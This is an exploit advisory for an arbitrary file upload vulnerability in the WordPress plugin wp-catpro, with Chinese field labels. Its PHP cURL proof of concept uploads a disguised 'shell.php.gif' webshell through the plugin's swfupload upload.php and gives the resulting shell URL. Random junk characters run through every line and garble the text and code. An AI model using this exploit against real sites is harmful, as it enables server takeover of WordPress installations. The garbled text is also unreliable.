Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability' W; z) v1 f* V- i6 @5 ^5 A- y3 L. c
#-----------------------------------------------------------------------5 B/ Z: p/ g2 y1 ?
8 q9 h8 l' |( A; A& \作者 => Zikou-16
; q2 e2 Q" ]. h7 T# `% m( n邮箱 => zikou16x@gmail.com Q; ~0 Y0 D& z! T
测试系统 : Windows 7 , Backtrack 5r3
% N! ]& [* U( L9 P" n* i+ E6 c下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip( { x6 X- a+ z+ ^+ }2 h& k, l
####
# S0 s) F: V! L/ \) a. Z / v. X3 q4 e8 W
#=> Exploit 信息:" \6 r4 V) }3 M+ [0 b8 h( K3 ]
------------------
7 v P+ Q* E5 u# 攻击者可以上传 file/shell.php.gif
* i1 x+ D/ e6 W$ H# R) |6 g# ("jpg", "gif", "png") // Allowed file extensions
% e. }6 R4 \4 `- ?! w5 C9 |% E# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)- r8 j, h+ M& R A+ r
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)2 a$ w2 _3 P% X- B
------------------
1 X/ I6 a8 _( h1 O Q % D* J/ h. x" G; c
#=> Exploit- f$ k( K( U& N9 M
----------- ?% ~1 f5 ~ l" V! P
<?php
6 ^" J& d- L: w R0 f
2 m% L, P5 k5 o6 F, r$uploadfile="zik.php.gif";
, v( T3 @4 T) l7 z$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");; Y) D& G; K: J3 T
curl_setopt($ch, CURLOPT_POST, true);
5 ?8 Y( |9 K: M0 O: Ucurl_setopt($ch, CURLOPT_POSTFIELDS,7 X! z4 |" S) V# v
array('Filedata'=>"@$uploadfile",/ B4 ]; T7 O% S) ^: M0 Z
'folder'=>'/wp-content/uploads/catpro/'));
: p* \7 l+ z. b5 S/ W7 l3 S+ Zcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
; `# |' K' c; v0 X: J( m$postResult = curl_exec($ch);, o# j1 ]& U$ U7 e/ a9 O; C8 x- Q
curl_close($ch);0 ]) p$ C K; d/ t- [1 M
6 S8 A: m& q' |( v+ \
print "$postResult";
, o8 H+ B2 ] ?# \' {/ O
) j3 D& L% d- \2 K) ]$ hShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
0 W" U! I2 L9 n. L1 u f ?>8 x/ f7 M9 ?' ^% n4 m4 ]2 C6 {- Z
<?php
) X# r7 ]5 _$ e/ R" ~, pphpinfo();
" {! o2 G5 j1 F/ x6 ^?> |